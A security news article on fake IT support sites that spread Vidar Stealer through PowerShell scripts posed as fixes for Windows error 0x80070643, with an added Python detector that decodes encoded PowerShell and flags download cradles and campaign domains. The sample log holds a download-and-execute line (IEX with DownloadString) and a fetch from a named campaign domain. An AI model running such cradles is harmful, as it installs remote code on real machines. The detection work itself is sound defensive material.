Malicious PowerShell Scripts Posed as Windows Fixes by Fake IT Support Sites

June 30, 2024

Fake IT support websites are distributing harmful PowerShell scripts disguised as solutions to common Windows errors, such as the 0x80070643 error, to infect devices with malware that steals information. These fraudulent support sites are being promoted via compromised YouTube channels, adding a sense of legitimacy to the content. The threat actors are specifically targeting the 0x80070643 error that has been troubling millions of Windows users since January.

The 0x80070643 error surfaced after Microsoft released security updates to fix a BitLocker encryption bypass flaw, tracked as CVE-2024-20666, during the January 2024 Patch Tuesday. Following the update, Windows users worldwide reported receiving '0x80070643 - ERROR_INSTALL_FAILURE' when trying to install the update. The error message displayed by Windows Update was incorrect, as it should have shown a CBS_E_INSUFFICIENT_DISK_SPACE error on systems with a Windows Recovery Environment (WinRE) partition that's too small for the update to install.

Expanding the WinRE partition is a complex task, and for some users it is impossible when the WinRE partition is not the last one on the drive. This has left many unable to install the security update, and they continue to receive the 0x80070643 error every time they use Windows Update. Many frustrated Windows users have therefore searched for a solution online, giving threat actors an opportunity to exploit that search for a fix.

eSentire's Threat Response Unit (TRU) observed a case in June 2024 involving a Vidar Stealer infection initiated through a fake IT support website. The infection began when the victim performed a web search for solutions to a Windows Update Error code. The researchers discovered two fake IT support sites promoted on YouTube named pchelprwizzards[.]com and pchelprwizardsguide[.]com. Additional sites were also found, including pchelprwizardpro[.]com, pchelperwizard[.]com, and fixedguides[.]com. These sites all offer fixes that require users to copy and run a PowerShell script or import the contents of a Windows Registry file.

Regardless of which 'solution' the victim picks, the result is a PowerShell script that downloads malware onto the device. The PowerShell script contains a Base64-encoded script that connects to a remote server to download another PowerShell script, which installs the Vidar information-stealing malware on the device. After the script completes, it displays a message that the fix was successful and prompts the user to restart the computer, which also launches the malware.
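A defender-side triage check for the chain described above, added here as an example and not code from the article or from eSentire: it parses process-creation records, decodes any `-EncodedCommand` argument (PowerShell reads that blob as UTF-16LE text), flags download-and-execute primitives in both the raw and decoded command line, and matches the domains named in this article. The log format (`timestamp|user|command line`), the sample lines and the encoded placeholder payload pointing at a reserved `.invalid` host are all constructed for the example.

```python
import base64
import re
from typing import Dict, List, Optional

# Domains named in the article, refanged here so they can be matched against
# command lines. Treat this as a starting watchlist, not a complete one.
KNOWN_DOMAINS = {
    "pchelprwizzards.com",
    "pchelprwizardsguide.com",
    "pchelprwizardpro.com",
    "pchelperwizard.com",
    "fixedguides.com",
}

# Download-and-execute primitives that a copy-pasted "fix" has no business using.
CRADLE_PATTERNS = {
    "invoke-webrequest": re.compile(r"invoke-webrequest|\biwr\b", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "downloadfile": re.compile(r"downloadfile", re.I),
    "invoke-expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "frombase64string": re.compile(r"frombase64string", re.I),
    "start-bitstransfer": re.compile(r"start-bitstransfer", re.I),
}

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc),
# followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"\s-(?:enc(?:odedcommand)?|e[cn]?)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand argument; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def severity(findings: Dict[str, object]) -> str:
    """Crude triage score: known domain or encoded cradle is high, either alone is medium."""
    if findings["domain_hits"] or (findings["encoded"] and findings["cradle_hits"]):
        return "high"
    if findings["encoded"] or findings["cradle_hits"]:
        return "medium"
    return "low"


def analyze_command_line(cmd: str) -> Dict[str, object]:
    """Flag encoded payloads, download cradles and known domains in one command line."""
    findings: Dict[str, object] = {"encoded": False, "decoded": None}
    text = cmd
    m = ENCODED_FLAG.search(cmd)
    if m:
        findings["encoded"] = True
        decoded = decode_encoded_command(m.group(1))
        findings["decoded"] = decoded
        if decoded:
            text = cmd + "\n" + decoded  # scan the decoded payload as well as the wrapper
    findings["cradle_hits"] = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)]
    findings["domain_hits"] = sorted(d for d in KNOWN_DOMAINS if d in text.lower())
    findings["severity"] = severity(findings)
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse constructed 'timestamp|user|command line' records and analyze each one."""
    results = []
    for line in lines:
        ts, user, cmd = line.split("|", 2)
        rec: Dict[str, object] = {"time": ts, "user": user, "cmd": cmd}
        rec.update(analyze_command_line(cmd))
        results.append(rec)
    return results


# Constructed sample data (not from the article). The encoded payload is built here
# from a placeholder download cradle that points at a reserved .invalid host.
SAMPLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "2024-06-30T10:01:12|alice|powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + SAMPLE_ENCODED,
    "2024-06-30T10:02:40|bob|powershell.exe -Command Get-ChildItem C:\\Users",
    "2024-06-30T10:03:05|carol|powershell.exe -Command \"Invoke-WebRequest https://fixedguides.com/fix.reg -OutFile fix.reg\"",
]

if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(f"{rec['severity']:6} {rec['time']} {rec['user']}: cradles={rec['cradle_hits']} domains={rec['domain_hits']}")
        if rec["decoded"]:
            print("       decoded:", rec["decoded"])
```

The first sample line lands as high because the wrapper uses `-EncodedCommand` and the decoded text contains a download cradle; the third lands as high on the domain match alone, which is the point of keeping a watchlist: a plain `Invoke-WebRequest` is common in administration, but one fetching a "fix" from a site named in a campaign is not. The second line shows ordinary PowerShell use staying low, since the decoder only fires on a flag that takes Base64 and the cradle patterns ignore benign cmdlets.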

The stolen data is used to fuel other attacks, such as ransomware attacks, or sold to other threat actors on dark web marketplaces. The infected user is left with a nightmare, having all their accounts compromised and potentially suffering financial fraud. It is crucial to download software and fixes only from trusted websites, not from random videos and websites with little or no reputation.
